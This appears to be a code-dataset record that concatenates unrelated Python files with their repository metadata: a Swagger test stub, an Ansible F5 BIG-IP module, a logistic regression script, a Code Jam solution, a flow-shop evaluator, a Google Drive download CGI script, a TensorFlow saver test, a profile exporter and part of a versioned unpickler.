712c217d06209ae2dd8bfe1aca97dc90f5576fcd
|
[] |
no_license
|
cbrowet-axway/APIM_sdk
|
d4f4a124e86a7b2e65d0ef07b54c68e95de68337
|
4f82df67ebe3dd6eae645bab8f86e72c0347ee24
|
refs/heads/master
| 2020-05-25T13:22:35.802350
| 2020-04-16T09:25:21
| 2020-04-16T09:25:21
| 187,820,389
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 894
|
py
|
# coding: utf-8
"""
API Manager API v1.3
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 1.3.0
Contact: support@axway.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.group import Group # noqa: E501
from swagger_client.rest import ApiException
class TestGroup(unittest.TestCase):
    """Group unit test stubs"""

    def setUp(self):
        """No fixtures required for the generated stub."""
        pass

    def tearDown(self):
        """Nothing to clean up."""
        pass

    def testGroup(self):
        """Test Group"""
        # FIXME: construct object with mandatory attributes with example values
        # model = swagger_client.models.group.Group()  # noqa: E501
        pass


if __name__ == '__main__':
    unittest.main()
|
[
"cbro@semperpax.com"
] |
cbro@semperpax.com
|
4acd426428bf36b3e05b49f55188a9d1fb157d9d
|
eccda8bebcf343c6c2742980a604905135485b69
|
/library/f5bigip_ltm_persistence_ssl.py
|
f4700fcb09e98962ecc1758d5f6d19e2c719c089
|
[
"Apache-2.0"
] |
permissive
|
erjac77/ansible-module-f5bigip
|
5c920dc239098d6d3a8311da3ccb9562428a8362
|
96af6d5dc77d8ccbe18cb4fdc916625756e5f9dd
|
refs/heads/master
| 2021-01-11T08:33:52.304903
| 2020-02-14T21:42:09
| 2020-02-14T21:42:09
| 76,477,286
| 6
| 5
|
Apache-2.0
| 2018-08-09T20:41:31
| 2016-12-14T16:30:04
|
Python
|
UTF-8
|
Python
| false
| false
| 5,650
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2016-2018, Eric Jacob <erjac77@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Metadata consumed by Ansible tooling (ansible-doc, sanity tests) to
# describe this module's maturity and support channel.
ANSIBLE_METADATA = {
    'metadata_version': '1.1',
    'status': ['preview'],
    'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: f5bigip_ltm_persistence_ssl
short_description: BIG-IP ltm persistence ssl module
description:
- Configures a Secure Socket Layer (SSL) persistence profile.
version_added: "2.4"
author:
- "Eric Jacob (@erjac77)"
options:
app_service:
description:
- Specifies the application service to which the object belongs.
defaults_from:
description:
- Specifies the existing profile from which the system imports settings for the new profile.
default: ssl
description:
description:
- Specifies descriptive text that identifies the component.
match_across_pools:
description:
- Specifies, when enabled, that the system can use any pool that contains this persistence record.
default: disabled
choices: ['enabled', 'disabled']
match_across_services:
description:
- Specifies, when enabled, that all persistent connections from a client IP address, which go to the same
virtual IP address, also go to the same node.
default: disabled
choices: ['enabled', 'disabled']
match_across_virtuals:
description:
- Specifies, when enabled, that all persistent connections from the same client IP address go to the same
node.
default: disabled
choices: ['enabled', 'disabled']
mirror:
description:
- Specifies whether the system mirrors persistence records to the high-availability peer.
default: disabled
choices: ['enabled', 'disabled']
name:
description:
- Specifies a unique name for the component.
required: true
override_connection_limit:
description:
- Specifies, when enabled, that the pool member connection limits are not enforced for persisted clients.
default: disabled
choices: ['enabled', 'disabled']
partition:
description:
- Specifies the administrative partition in which the component object resides.
default: Common
state:
description:
- Specifies the state of the component on the BIG-IP system.
default: present
choices: ['absent', 'present']
timeout:
description:
- Specifies the duration of the persistence entries.
default: 300
requirements:
- BIG-IP >= 12.0
- ansible-common-f5
- f5-sdk
'''
# Usage example rendered by `ansible-doc`.
# fixed: the example previously invoked f5bigip_ltm_persistence_cookie,
# which is a different module — this file implements the SSL variant.
EXAMPLES = '''
- name: Create LTM SSL Persistence profile
  f5bigip_ltm_persistence_ssl:
    f5_hostname: 172.16.227.35
    f5_username: admin
    f5_password: admin
    f5_port: 443
    name: my_ssl_persistence
    partition: Common
    description: My ssl persistence profile
    defaults_from: /Common/ssl
    state: present
  delegate_to: localhost
'''
RETURN = ''' # '''
from ansible.module_utils.basic import AnsibleModule
from ansible_common_f5.base import F5_ACTIVATION_CHOICES
from ansible_common_f5.base import F5_NAMED_OBJ_ARGS
from ansible_common_f5.base import F5_PROVIDER_ARGS
from ansible_common_f5.bigip import F5BigIpNamedObject
class ModuleParams(object):
    """Builds the AnsibleModule argument specification for this module."""

    @property
    def argument_spec(self):
        """Module-specific options merged with the shared F5 provider and
        named-object (name/partition/state) argument groups."""
        spec = dict(
            app_service=dict(type='str'),
            defaults_from=dict(type='str'),
            description=dict(type='str'),
            match_across_pools=dict(type='str', choices=F5_ACTIVATION_CHOICES),
            match_across_services=dict(type='str', choices=F5_ACTIVATION_CHOICES),
            match_across_virtuals=dict(type='str', choices=F5_ACTIVATION_CHOICES),
            mirror=dict(type='str', choices=F5_ACTIVATION_CHOICES),
            override_connection_limit=dict(type='str', choices=F5_ACTIVATION_CHOICES),
            timeout=dict(type='int'),
        )
        # Connection parameters plus the common named-object parameters.
        spec.update(F5_PROVIDER_ARGS)
        spec.update(F5_NAMED_OBJ_ARGS)
        return spec

    @property
    def supports_check_mode(self):
        """Check mode is supported end-to-end by the common F5 layer."""
        return True
class F5BigIpLtmPersistenceSsl(F5BigIpNamedObject):
    """Named-object wrapper binding CRUD verbs to the BIG-IP SSL
    persistence endpoints of the f5-sdk REST client."""

    def _set_crud_methods(self):
        # Map each generic CRUD verb used by F5BigIpNamedObject onto the
        # corresponding ltm/persistence/ssl endpoint method.
        self._methods = {
            'create': self._api.tm.ltm.persistence.ssls.ssl.create,
            'read': self._api.tm.ltm.persistence.ssls.ssl.load,
            'update': self._api.tm.ltm.persistence.ssls.ssl.update,
            'delete': self._api.tm.ltm.persistence.ssls.ssl.delete,
            'exists': self._api.tm.ltm.persistence.ssls.ssl.exists
        }
def main():
    """Ansible entry point: build the module, flush the F5 object state to
    the device, and report the result (or failure) as JSON."""
    params = ModuleParams()
    module = AnsibleModule(argument_spec=params.argument_spec,
                           supports_check_mode=params.supports_check_mode)

    try:
        ssl_persistence = F5BigIpLtmPersistenceSsl(
            check_mode=module.check_mode, **module.params)
        module.exit_json(**ssl_persistence.flush())
    except Exception as exc:
        module.fail_json(msg=str(exc))


if __name__ == '__main__':
    main()
|
[
"erjac77@gmail.com"
] |
erjac77@gmail.com
|
fd9fed8d50f3bc3779e3425c4fcf511a9684675a
|
bd37ff289bcbe24cc6e8ab360569713b9109265d
|
/logistic_regression1.py
|
0e62f1edd37807715a19d1310c273bd42e8e156f
|
[] |
no_license
|
Sanil2108/python-machine-learning
|
fc035f6ddd586cf3dab9421002d4408c03b0589c
|
c9dbf8a1f34aa3b80c76986c742e85a9be4b2375
|
refs/heads/master
| 2021-01-11T09:00:28.995823
| 2017-06-18T06:08:33
| 2017-06-18T06:08:33
| 77,436,496
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,948
|
py
|
import numpy as np
import matplotlib.pyplot as plt
# Module-level history of the cost recorded at each gradient-descent epoch.
all_cost=[]
def logistic(z):
    """Sigmoid function: map any real number (or array) into (0, 1)."""
    return 1 / (1 + np.exp(-z))


def hypothesis(theta, X):
    """Logistic-regression hypothesis h_theta(X) = sigmoid(theta . X) for a
    single sample X (bias feature included in X)."""
    # np.dot replaces the deprecated np.matrix round-trip of the original;
    # the value is numerically identical.
    return logistic(np.dot(X, theta))


def cost(theta, X, y):
    """Average cross-entropy loss of *theta* over the dataset (X, y)."""
    m = len(y)
    total = 0
    for i in range(m):
        h = hypothesis(theta, X[i])
        total += y[i] * np.log(h) + (1 - y[i]) * np.log(1 - h)
    return -total / m
def gradient_descent(X, y, alpha):
    """Batch gradient descent for logistic regression.

    Reads and mutates the module-level `theta` in place and appends each
    epoch's cost to the module-level `all_cost` list; returns `theta`.

    Args:
        X: list of samples, each an (n+1)-element feature row (bias included).
        y: list of 0/1 labels.
        alpha: learning rate.
    """
    tempCost=1000
    # Iterate until the cost is small enough or progress stalls (break below).
    while(tempCost>0.01):
        for j in range(len(theta)):
            # pd accumulates the partial derivative of the cost w.r.t.
            # theta[j], summed over all samples.
            pd=0
            for i in range(len(y)):
                pd+=(hypothesis(theta, X[i])-y[i])*X[i][j]
            theta[j]=theta[j]-alpha*pd
        all_cost.append(tempCost)
        # Stop when the cost improvement over one epoch is effectively zero.
        if(tempCost-cost(theta, X, y)<1e-50):
            break
        tempCost=cost(theta, X, y)
        print(tempCost)
    print(theta)
    # temp_x = np.linspace(0, len(all_cost), len(all_cost) + 1)
    # for i in range(len(all_cost)):
    #     plt.plot(temp_x[i], all_cost[i], 'ro')
    # plt.show()
    return theta
#X is an (n+1) row vector
def getY(theta, X):
    """Binary prediction for one sample: 1 if theta . X >= 0.5, else 0.

    NOTE(review): this thresholds the raw linear score at 0.5 rather than
    the logistic output — presumably intentional here, but worth confirming.
    """
    # np.dot yields a plain scalar, replacing the deprecated np.matrix
    # product (whose 1x1-array truthiness the original relied on).
    return 1 if np.dot(X, theta) >= 0.5 else 0
# new dataset for a circular decision boundary
# Each row is one engineered-feature sample; the columns appear to be
# [1, x, x^2, y, y^2, x*y] (bias + quadratic terms) — TODO confirm —
# which lets a linear model in this feature space fit a circle.
X = [
    [1, 0, 0, 0, 0, 0],
    [1, 0.5, 0.25, -0.5, 0.25, -0.25],
    [1, 0.5, 0.25, 0.5, 0.25, 0.25],
    [1, - 0.5, 0.25, -0.5, 0.25, 0.25],
    [1, -0.5, 0.25, 0.5, 0.25, -0.25],
    [1, 1, 1, 1, 1, 1],
    [1, 1, 1, -1, 1, -1],
    [1, -1, 1, 1, 1, -1],
    [1, -1, 1, -1, 1, 1],
    [1, 0, 0, 1, 1, 0],
    [1, 0, 0, -1, 1, 0],
    [1, 1, 1, 0, 0, 0],
    [1, -1, 1, 0, 0, 0]
]
# Labels: inner points are class 0, outer points class 1.
y = [
    0,
    0,
    0,
    0,
    0,
    1,
    1,
    1,
    1,
    1,
    1,
    1,
    1
]
# Initial parameter vector; mutated in place by gradient_descent.
theta = [
    0,
    0,
    0,
    0,
    0,
    0
]
# learning rate
alpha = 0.05
gradient_descent(X, y, alpha)
|
[
"sanilkhurana7@gmail.com"
] |
sanilkhurana7@gmail.com
|
b81f580bfd884ff1bbcd428a82ed1131ae1d6e8d
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_75/717.py
|
36146101c64393b9b35cbf7d17c8eadde15d28f0
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,286
|
py
|
def solvecase(L):
    """Simulate one spell-casting case and return the final element list.

    L is the flat token list of one input line:
    [C, C formulas, D, D opposing pairs, N, spell string].
    """
    C = int(L[0])               # number of combine formulas
    D = int(L[C + 1])           # number of opposing pairs
    N = int(L[C + D + 2])       # spell count (parsed but unused)
    formulas = L[1:C + 1]
    opposed = L[C + 2:C + D + 2]
    spells = L[-1]

    elements = []
    for spell in spells:
        elements.append(spell)
        # Try to combine the two most recently produced elements.
        if len(elements) > 1:
            combined = chkcombine(formulas, elements[-1], elements[-2])
            if combined is not None:
                elements[-2:] = [combined]
        # Any opposing pair involving the newest element wipes everything.
        for earlier in elements[:-1]:
            if chkoppose(opposed, earlier, elements[-1]):
                elements = []
                break
    return elements


def chkcombine(formulalist, s1, s2):
    """Return the result element of a formula whose input pair matches
    {s1, s2} (order-insensitive), or None if no formula applies."""
    pair = {s1, s2}
    for formula in formulalist:
        if {formula[0], formula[1]} == pair:
            return formula[2]
    return None


def chkoppose(opposelist, s1, s2):
    """True when (s1, s2) form an opposing pair, in either order."""
    pair = {s1, s2}
    for oppose in opposelist:
        if {oppose[0], oppose[1]} == pair:
            return True
    return False
# Read the case count, then solve and print each case in GCJ output format:
# Case #k: [e1, e2, ...]
case_count = int(input())
for case_no in range(case_count):
    elements = solvecase(input().split(' '))
    print("Case #{}: [{}]".format(case_no + 1, ", ".join(elements)))
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
97f962ce6c17f6babfe9ca499eb8d54b7c02b803
|
ba1066b0860a73020eb5c4ee0021f68e3639327c
|
/Sujet 1/evaluation.py
|
2a1b30bdb920408611258d3a5c7a66af323e27fe
|
[] |
no_license
|
Hiestaa/TARP-ODNL
|
cf51678ce4940d2d84a167317eb70298863cc9b1
|
3a09054558ddc188f80abfd13ea51e1e99d64d68
|
refs/heads/master
| 2021-01-25T07:27:54.313545
| 2014-01-13T01:14:33
| 2014-01-13T01:14:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,300
|
py
|
from machine import Machine
from task import Task
import Log
import time
import os.path
class Evaluation:
    """Flow-shop schedule evaluator (Python 2).

    Computes the makespan of *tasks* executed in the order given by
    *sequence*, either analytically (fast) or by a tick-by-tick discrete
    simulation over a linked list of Machine objects (simulation).
    """

    def __init__(self, tasks, sequence, id):
        # Reorder the task list according to the requested sequence of indices.
        self.tasks = []
        for ti in sequence:
            self.tasks.append(tasks[ti])
        self.nbtasks = len(self.tasks)
        self.taskcomplete = 0        # incremented by ontaskdone()
        self.machinelist = None      # head of the Machine linked list
        self.time = 0                # simulated clock, in ticks
        self.log = None              # HTML logger, created lazily in simulation()
        #self.log = Log.Log('log/last.log.html')
        self.id = id                 # used to derive a unique log file name

    def fast(self) :
        """Analytic makespan via the classic flow-shop recurrence
        C[j][i] = max(C[j-1][i], C[j][i-1]) + p[j][i], computed in place."""
        # Copy each task's operation durations so the recurrence can
        # overwrite them with cumulative completion times.
        tab = []
        for t in self.tasks:
            copytask = []
            for op in t.oplist:
                copytask.append(op)
            tab.append(copytask)
        nbLines = len(tab[0])
        nbColonnes = len(tab)
        # First task: its operations run back to back.
        i = 1
        while i < nbLines :
            tab[0][i] = tab[0][i - 1] + tab[0][i]
            i += 1
        j = 1
        while j < nbColonnes :
            # First operation of task j waits for task j-1's first operation.
            tab[j][0] = tab[j - 1][0] + tab[j][0]
            i = 1
            while i < nbLines :
                # An operation starts when both the same machine (previous
                # task) and the previous machine (same task) are free.
                if tab[j - 1][i] > tab[j][i - 1] :
                    tmp = tab[j - 1][i]
                else :
                    tmp = tab[j][i - 1]
                tab[j][i] = tab[j][i] + tmp
                i += 1
            j += 1
        return tab[nbColonnes - 1][nbLines - 1]
        # Unreachable reference implementation kept from the original:
        # c = np.zeros((n + 1, m + 1))
        # for i in range(1, n + 1):
        #     for j in range(1, m + 1):
        #         c[i, j] = max(c[i - 1, j], c[i, j - 1]) + tasks[order[i - 1], j - 1]
        # return c[n, m]

    def ontaskdone(self, task):
        """Callback fired by the last machine when a task fully completes."""
        self.taskcomplete += 1
        self.log.log_event_success(self.time, 'TaskEvent',"A task has been finished: " +str(task.id))

    def onopdone(self):
        """Callback fired when the first machine frees up: feed it the next task."""
        self.log.log_event(self.time, 'TaskEvent', "An operation has been finished on first machine !")
        if len(self.tasks):
            task = self.tasks.pop(0)
            task.reinit()
            self.machinelist.assignTask(task, self.onopdone, self.ontaskdone)

    def findUniqueName(self, name):
        """Derive a log-file path from *name* that does not collide with an
        existing file, trying successively longer '-'-joined prefixes."""
        lst = name.split('-')
        for x in range(len(lst)):
            # NOTE(review): 'is not 0' is an identity comparison; it happens
            # to work for small ints in CPython but should be '!= 0'.
            if x is not 0:
                # NOTE(review): bare 'reduce' is the Python 2 builtin.
                test = reduce(lambda a, b: a + '-' + b,lst[:x])
                if not os.path.isfile('log/' + test + '.log.html'):
                    return 'log/' + test + '.log.html'
        return 'log/' + name + '.log.html'

    def simulation(self):
        """Tick-by-tick simulation of the schedule.

        Builds one Machine per operation of the first task (chained as a
        linked list), then advances the clock until every task has completed.
        Writes an HTML execution log and returns the makespan (final clock).
        """
        self.log = Log.Log(self.findUniqueName(self.id))
        self.log.log_init_tasklist(self.tasks)
        self.log.log_event_info(self.time, 'Execution', "Execution started !")
        task = self.tasks.pop(0)
        task.reinit()
        k = 0
        for op in task.oplist:
            m = Machine(k, self.log)
            k += 1
            # Append the new machine at the tail of the linked list.
            if not self.machinelist:
                self.machinelist = m
            else:
                tmp = self.machinelist
                while tmp.next:
                    tmp = tmp.next
                tmp.next = m
        self.log.log_event(self.time, 'Execution', str(self.machinelist.getNbMachines()) + " machines added to process operations.")
        self.machinelist.assignTask(task, self.onopdone, self.ontaskdone)
        # NOTE(review): 'is not' identity test on ints again; works for small
        # counts in CPython but '!=' would be correct.
        while self.taskcomplete is not self.nbtasks:
            #print self.time,
            self.time += 1
            self.machinelist.update(self.time)
        self.log.log_event_success(self.time, 'Execution', "All tasks done, execution successfully done !")
        # Dump per-machine utilisation statistics before closing the log.
        self.log.log_init_machines()
        m = self.machinelist
        while m:
            self.log.log_machine_state(m.id, m.total_working_time, m.total_waiting_time, m.work_history)
            m = m.next
        self.log.log_close()
        return self.time
if __name__ == '__main__':
tasks = [
Task(1, [10, 40, 30]),
Task(2, [20, 50, 10]),
Task(3, [1, 5, 10]),
Task(4, [5, 20, 10]),
Task(5, [10, 15, 5])
]
seq = [4, 3, 1, 2, 0]
t = time.time()
itern = Evaluation(tasks, seq).run()
print ""
print "Evaluation time: ", time.time() - t, "s"
print "Evaluation result: ", itern, 'iterations'
|
[
"rom1guyot@gmail.com"
] |
rom1guyot@gmail.com
|
966d74d56d048ce98e54842ab9549589742118e9
|
2a839c9f5ad608cbc6cbb7d03a8af482dcbd2956
|
/cgi-bin/download.py
|
49a2220a84d8090abe8d27c4ea01117f334c80cc
|
[] |
no_license
|
scraperdragon/google-docs
|
0a3653a10a8f4db6c419745e87c45564706405f8
|
56a6955bfbfa1acc56732356f9d828690985fce3
|
refs/heads/master
| 2021-01-19T15:32:38.868177
| 2015-04-17T10:55:17
| 2015-04-17T10:55:17
| 22,986,877
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,379
|
py
|
#!/usr/bin/python
import sys
import os
import requests
import json
import urlparse
def request_with_key(url):
    """GET *url* with an OAuth bearer token; reads the module-global `key`
    (set later from argv or the CGI query string)."""
    return requests.get(url, headers={'Authorization': 'Bearer {key}'.format(key=key)})
def output(msg):
    """Emit *msg* as the JSON CGI response body and terminate the script."""
    # NOTE: Python 2 print statement; this file is a Python 2 CGI script.
    print json.dumps(msg)
    exit(0)
# Drive v2 metadata endpoint and (unused here) legacy document export URL.
DRIVE_FILES_URL = "https://www.googleapis.com/drive/v2/files/{id}"
DOCUMENT_EXPORT_URL = "https://docs.google.com/feeds/download/documents/export/Export?id={id}&exportFormat={format}"

# CGI header must be written before any JSON body from output().
print "Content-type: application/json\n\n";

# acquire environment
# Parameters come from argv (command-line testing) or the CGI query string.
if len(sys.argv) == 4:
    doc_id, key, filename = sys.argv[1:]
else:
    params = urlparse.parse_qs(os.environ.get("QUERY_STRING"))
    doc_id, = params.get('id')
    key, = params.get('key')
    filename, = params.get('filename')

if not(doc_id):
    output({"error": "no id"})
if not(key):
    output({"error": "no key"})
if not(filename):
    output({"error": "no filename"})

# Fetch the file's Drive metadata to discover a download link.
r = request_with_key(DRIVE_FILES_URL.format(id=doc_id))
try:
    j = r.json()
except Exception:
    output({"error": "response wasn't json", "error_detail":r.content, "params": params})

# Prefer the direct downloadUrl; otherwise fall back to the xlsx export link.
if 'downloadUrl' in j:
    xlsx_url = j['downloadUrl']
else:
    xlsx_url = j['exportLinks']['application/vnd.openxmlformats-officedocument.spreadsheetml.sheet']

xlsx_content = request_with_key(xlsx_url).content

with open(filename, 'w') as f:
    f.write(xlsx_content)

output({"filename": filename})
|
[
"dragon@scraperwiki.com"
] |
dragon@scraperwiki.com
|
d0ec0a41b10c508f07c1ac2e6b2c38ba42f77c1e
|
6e58f95a931db523a3957134ff8cac670d4c20be
|
/Hunter level/given 2 string checking whether they are same without using built in function.py
|
0b85adde15d8c4f9f377c2739745e69844479191
|
[] |
no_license
|
ramyasutraye/python-programming-13
|
36235f324152d793ca1b2bf087d2a49a62d47787
|
ea58462208bb4da826b9f1917bdad17c80d055dc
|
refs/heads/master
| 2020-04-23T19:30:53.189933
| 2018-05-02T17:13:30
| 2018-05-02T17:13:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 232
|
py
|
# Compare two strings character by character (no built-in comparison helpers)
# and print "yes" if they are identical, "no" otherwise.
a = str(input())
b = str(input())
l1 = len(a)
l2 = len(b)
if l1 == l2:
    # fixed: the original overwrote `flag` on every iteration, so only the
    # LAST character was actually compared (and `flag` was undefined for
    # empty strings). Start optimistic and latch to 0 on the first mismatch.
    flag = 1
    for i in range(l1):
        if a[i] != b[i]:
            flag = 0
            break
    if flag == 1:
        print("yes")
    else:
        print("no")
else:
    print("no")
|
[
"noreply@github.com"
] |
ramyasutraye.noreply@github.com
|
9cd8a6e55a4e5085df6657d0a04781d0dee9ed7b
|
b5a9d42f7ea5e26cd82b3be2b26c324d5da79ba1
|
/tensorflow/python/training/saver_large_variable_test.py
|
f19600a79e7b85bc841cc500c0681bd62a3cd3a6
|
[
"Apache-2.0"
] |
permissive
|
uve/tensorflow
|
e48cb29f39ed24ee27e81afd1687960682e1fbef
|
e08079463bf43e5963acc41da1f57e95603f8080
|
refs/heads/master
| 2020-11-29T11:30:40.391232
| 2020-01-11T13:43:10
| 2020-01-11T13:43:10
| 230,088,347
| 0
| 0
|
Apache-2.0
| 2019-12-25T10:49:15
| 2019-12-25T10:49:14
| null |
UTF-8
|
Python
| false
| false
| 2,386
|
py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Tests for tensorflow.python.training.saver.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from tensorflow.core.protobuf import saver_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import saver
class SaverLargeVariableTest(test.TestCase):
  # NOTE: This is in a separate file from saver_test.py because the
  # large allocations do not play well with TSAN, and cause flaky
  # failures.

  def testLargeVariable(self):
    """Saving a single 2GB variable in V1 format must raise
    InvalidArgumentError (the slice is too large to serialize)."""
    save_path = os.path.join(self.get_temp_dir(), "large_variable")
    with session.Session("", graph=ops.Graph()) as sess:
      # Declare a variable that is exactly 2GB. This should fail,
      # because a serialized checkpoint includes other header
      # metadata.
      with ops.device("/cpu:0"):
        var = variables.Variable(
            constant_op.constant(
                False, shape=[2, 1024, 1024, 1024], dtype=dtypes.bool))
        # V1 checkpoints serialize each tensor as a single slice, which is
        # where the size limit is enforced.
        save = saver.Saver(
            {
                var.op.name: var
            }, write_version=saver_pb2.SaverDef.V1)
        var.initializer.run()
        with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
                                     "Tensor slice is too large to serialize"):
          save.save(sess, save_path)


if __name__ == "__main__":
  test.main()
|
[
"v-grniki@microsoft.com"
] |
v-grniki@microsoft.com
|
3d6963aee849bab68187c59aa775a10ae4a266f5
|
84b5ac79cb471cad1d54ed1d2c842dc5581a03f0
|
/branches/pylint/config/scripts/paella-export-profile
|
777b1b8eccf1dd0bbd7a397eb1c75fd8f43c9ebf
|
[] |
no_license
|
BackupTheBerlios/paella-svn
|
c8fb5ea3ae2a5e4ca6325a0b3623d80368b767f3
|
d737a5ea4b40f279a1b2742c62bc34bd7df68348
|
refs/heads/master
| 2021-01-18T14:07:40.881696
| 2012-11-13T20:33:08
| 2012-11-13T20:33:08
| 40,747,253
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 377
|
#!/usr/bin/env python
import os, sys
from paella.db import PaellaConnection
from paella.db.profile.xmlgen import PaellaProfiles
# Export the profile named on the command line to ./<profile>.xml,
# pretty-printed with tab indentation.
conn = PaellaConnection()
args = sys.argv[1:]
profile = args[0]
profiles = PaellaProfiles(conn)
# NOTE: Python 2 'file' builtin; this is a Python 2 script.
tfile = file(profile + '.xml', 'w')
xml = profiles.export_profile(profile)
xml.writexml(tfile, indent='\t', newl='\n', addindent='\t')
tfile.close()
|
[
"umeboshi@cfc4e7be-4be4-0310-bcfe-fc894edce94f"
] |
umeboshi@cfc4e7be-4be4-0310-bcfe-fc894edce94f
|
|
bbbfb496488a02ad49a1820a1d8e385052809eb7
|
3950cb348a4a3ff6627d502dbdf4e576575df2fb
|
/.venv/Lib/site-packages/apptools/persistence/versioned_unpickler.py
|
25338c9278da68d60cad7b6d117da78e73aaacdc
|
[] |
no_license
|
Bdye15/Sample_Programs
|
a90d288c8f5434f46e1d266f005d01159d8f7927
|
08218b697db91e55e8e0c49664a0b0cb44b4ab93
|
refs/heads/main
| 2023-03-02T04:40:57.737097
| 2021-01-31T03:03:59
| 2021-01-31T03:03:59
| 328,053,795
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,883
|
py
|
# (C) Copyright 2005-2020 Enthought, Inc., Austin, TX
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in LICENSE.txt and may be redistributed only under
# the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
#
# Thanks for using Enthought open source!
# Standard library imports
from pickle import _Unpickler as Unpickler
from pickle import UnpicklingError, BUILD
import logging
from types import GeneratorType
# Enthought library imports
from apptools.persistence.updater import __replacement_setstate__
logger = logging.getLogger(__name__)
##############################################################################
# class 'NewUnpickler'
##############################################################################
class NewUnpickler(Unpickler):
    """An unpickler that implements a two-stage pickling process to make it
    possible to unpickle complicated Python object hierarchies where the
    unserialized state of an object depends on the state of other objects in
    the same pickle.
    """

    def load(self, max_pass=-1):
        """Read a pickled object representation from the open file.

        Return the reconstituted object hierarchy specified in the file.
        *max_pass* bounds the number of initialization passes; a negative
        value lets initialize() derive the bound from the generator count.
        """
        # List of objects to be unpickled.
        self.objects = []

        # We overload the load_build method.
        # NOTE: dispatch is a class-level table shared by Unpickler
        # instances, so the override is active for the duration of this load
        # (see the classmethod note on load_build below).
        dispatch = self.dispatch
        dispatch[BUILD[0]] = NewUnpickler.load_build

        # call the super class' method.
        ret = Unpickler.load(self)
        self.initialize(max_pass)
        self.objects = []

        # Reset the Unpickler's dispatch table.
        dispatch[BUILD[0]] = Unpickler.load_build
        return ret

    def initialize(self, max_pass):
        """Run each unpickled object's __initialize__, cycling through
        generator-style initializers until all finish or *max_pass* passes
        elapse (raises UnpicklingError on suspected deadlock)."""
        # List of (object, generator) tuples that initialize objects.
        generators = []

        # Execute object's initialize to setup the generators.
        for obj in self.objects:
            if hasattr(obj, "__initialize__") and callable(obj.__initialize__):
                ret = obj.__initialize__()
                if isinstance(ret, GeneratorType):
                    generators.append((obj, ret))
                elif ret is not None:
                    raise UnpicklingError(
                        "Unexpected return value from "
                        "__initialize__. %s returned %s" % (obj, ret)
                    )

        # Ensure a maximum number of passes
        if max_pass < 0:
            max_pass = len(generators)

        # Now run the generators.
        count = 0
        while len(generators) > 0:
            count += 1
            if count > max_pass:
                not_done = [x[0] for x in generators]
                msg = """Reached maximum pass count %s. You may have
                a deadlock! The following objects are
                uninitialized: %s""" % (
                    max_pass,
                    not_done,
                )
                raise UnpicklingError(msg)
            for o, g in generators[:]:
                try:
                    next(g)
                except StopIteration:
                    generators.remove((o, g))

    # Make this a class method since dispatch is a class variable.
    # Otherwise, supposing the initial VersionedUnpickler.load call (which
    # would have overloaded the load_build method) makes a pickle.load call at
    # some point, we would have the dispatch still pointing to
    # NewPickler.load_build whereas the object being passed in will be an
    # Unpickler instance, causing a TypeError.
    def load_build(cls, obj):
        # Just save the instance in the list of objects.
        # obj.stack[-2] is presumably the instance receiving the BUILD state
        # (the state itself sits at stack[-1]) — standard pickle layout.
        if isinstance(obj, NewUnpickler):
            obj.objects.append(obj.stack[-2])
        Unpickler.load_build(obj)

    load_build = classmethod(load_build)
class VersionedUnpickler(NewUnpickler):
    """This class reads in a pickled file created at revision version 'n'
    and then applies the transforms specified in the updater class to
    generate a new set of objects which are at revision version 'n+1'.

    I decided to keep the loading of the updater out of this generic class
    because we will want updaters to be generated for each plugin's type
    of project.

    This ensures that the VersionedUnpickler can remain ignorant about the
    actual version numbers - all it needs to do is upgrade one release.
    """

    def __init__(self, file, updater=None):
        # updater=None means "read the file as already up to date".
        Unpickler.__init__(self, file)
        self.updater = updater

    def find_class(self, module, name):
        """Overridden method from Unpickler.

        Resolves (module, name) to a class, applying the updater's
        module/name remapping and __setstate__ injection when present.
        NB __setstate__ is not called until later.
        """
        if self.updater:
            # check to see if this class needs to be mapped to a new class
            # or module name
            original_module, original_name = module, name
            module, name = self.updater.get_latest(module, name)

